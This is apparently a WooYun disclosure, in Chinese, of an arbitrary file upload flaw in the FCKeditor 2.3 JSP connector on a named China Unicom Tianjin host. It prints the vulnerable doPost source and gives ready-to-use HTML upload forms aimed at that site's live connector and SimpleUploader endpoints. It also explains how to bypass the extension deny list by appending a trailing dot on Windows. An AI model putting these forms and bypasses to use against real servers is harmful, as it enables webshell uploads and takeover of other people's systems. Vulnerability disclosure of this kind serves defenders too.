WooYun.org

不好意思直接用人家发过的，就在找一个吧，天津的。
文件上传点
www.tj.chinaunicom.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/
FCK上传点，看一下web.xml
<servlet-name>Connector</servlet-name>
<servlet-class>
com.fredck.FCKeditor.connector.ConnectorServlet
类似是这样，该上传点，对应的class是com.fredck.FCKeditor.connector.ConnectorServlet.class
该类一般在FCKeditor-2.3.jar(不同版本不相同，说实话我仅测试了这个版本的)
源代码中有这样两个方法
public void doGet(HttpServletRequest request, HttpServletResponse response)
public void doPost(HttpServletRequest request, HttpServletResponse response)
doget是大家经常用的就不说了，就是获得所有上传文件列表。
dopost其实就是FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector 页面最终上传文件在后台执行的页面，
而看一下dopost的实现
public void doPost(HttpServletRequest request, HttpServletResponse response)
throws ServletException, IOException
{
if (debug) System.out.println("--- BEGIN DOPOST ---");
request.setCharacterEncoding("utf-8");
response.setContentType("text/html; charset=UTF-8");
response.setHeader("Cache-Control", "no-cache");
PrintWriter out = response.getWriter();
String commandStr = request.getParameter("Command");
String typeStr = request.getParameter("Type");
String currentFolderStr = "";
currentFolderStr = new String(request.getParameter("CurrentFolder").getBytes("ISO8859_1"), "UTF-8");
String realFileName = new String(request.getParameter("realFileName").getBytes("ISO8859_1"), "UTF-8");
String[] qmh_pathParts = realFileName.replace('\\', '/').split("/");
realFileName = qmh_pathParts[(qmh_pathParts.length - 1)];
String currentPath = baseDir + typeStr + currentFolderStr;
String currentDirPath = getServletContext().getRealPath(currentPath);
if (debug) System.out.println(currentDirPath);
String retVal = "0";
String newName = "";
if (!commandStr.equals("FileUpload")) {
retVal = "203";
} else {
DiskFileUpload upload = new DiskFileUpload();
upload.setRepositoryPath(getServletContext().getRealPath(baseDir) + "\\temp\\");
try
{
List items = upload.parseRequest(request);
Map fields = new HashMap();
Iterator iter = items.iterator();
while (iter.hasNext()) {
FileItem item = (FileItem)iter.next();
if (item.isFormField())
fields.put(item.getFieldName(), item.getString());
else
fields.put(item.getFieldName(), item);
}
FileItem uplFile = (FileItem)fields.get("NewFile");
String fileName = realFileName;
String nameWithoutExt = getNameWithoutExtension(fileName);
String ext = getExtension(fileName);
File pathToSave = new File(currentDirPath, fileName);
int counter = 1;
while (pathToSave.exists()) {
newName = nameWithoutExt + "(" + counter + ")" + "." + ext;
retVal = "201";
pathToSave = new File(currentDirPath, newName);
counter++;
}
uplFile.write(pathToSave);
} catch (Exception ex) {
ex.printStackTrace();
retVal = "203";
}
}
out.println("<script type=\"text/javascript\">");
out.println("window.parent.frames['frmUpload'].OnUploadCompleted(" + retVal + ",'" + newName + "');");
out.println("</script>");
out.flush();
out.close();
if (debug) System.out.println("--- END DOPOST ---");
}
不用说，典型上传漏洞，未对文件后缀限制，这个其实是FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
上传漏洞的根源，有些站点以为删除了FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector就防住了漏洞，其实完
全可以自己构造，如:
<body >
<form action ="http://www.tj.chinaunicom.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?
Command=FileUpload&Type=Image&CurrentFolder=/" method="post" name="form1" enctype="multipart/form-data">
<input name="NewFile" type="FILE" >
<input type="submit" name="Submit" value="上传" >
</form>
</body>
保存成html就可以实现上传。
题外话:
对该编辑器简单看一下还有一个上传点:web.xml中配置如下:
<servlet-name>SimpleUploader</servlet-name>
<servlet-class>
com.fredck.FCKeditor.uploader.SimpleUploaderServlet
</servlet-class>
<servlet-name>SimpleUploader</servlet-name>
<url-pattern>
/FCKeditor/editor/filemanager/upload/simpleuploader
</url-pattern>
因此上传处理class是com.fredck.FCKeditor.uploader.SimpleUploaderServlet.class，打开源代码看一下，初次看来做的很好，有后缀限制
但是细看还是可能存在问题，主要在如下函数中判断后缀
private boolean extIsAllowed(String fileType, String ext)
{
ext = ext.toLowerCase();
ArrayList allowList = (ArrayList)allowedExtensions.get(fileType);
ArrayList denyList = (ArrayList)deniedExtensions.get(fileType);
if (allowList.size() == 0)
{
return !denyList.contains(ext);
}
if (denyList.size() == 0)
{
return allowList.contains(ext);
}
return false;
}
是一个黑名单和白名单的问题，如果web.xml中没有设置白名单，就会变成黑名单检查，黑名单你懂的，很容易绕过。
看了一些站点web.xml关于fck的配置都类似这样
<init-param>
<param-name>AllowedExtensionsFile</param-name>
<param-value></param-value>
</init-param>
<init-param>
<param-name>DeniedExtensionsFile</param-name>
<param-value>
php|php3|php5|phtml|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|dll|reg|cgi
</param-value>
</init-param>
对File类型是白名单为空，黑名单检查，大家都明白怎么绕过了，
<body >
<form action ="http://www.tj.chinaunicom.com/FCKeditor/editor/filemanager/upload/simpleuploader??Command=FileUpload&Type=File&CurrentFolder=/" method="post"
name="form1" enctype="multipart/form-data">
<input name="NewFile" type="FILE" >
<input type="submit" name="Submit" value="上传" >
</form>
</body>
上传的时候 简单的在后面名后加个点(windows系统)就可以，如果没写明白，看看以前写在这里的
http://hi.baidu.com/possible_1/blog/item/fa5d6731f933cb729922ed95.html
如果还名看明白，就是因为我没写清楚 呵呵
没有去看这个站上到底有什么 害怕被抓，大公司惹不起....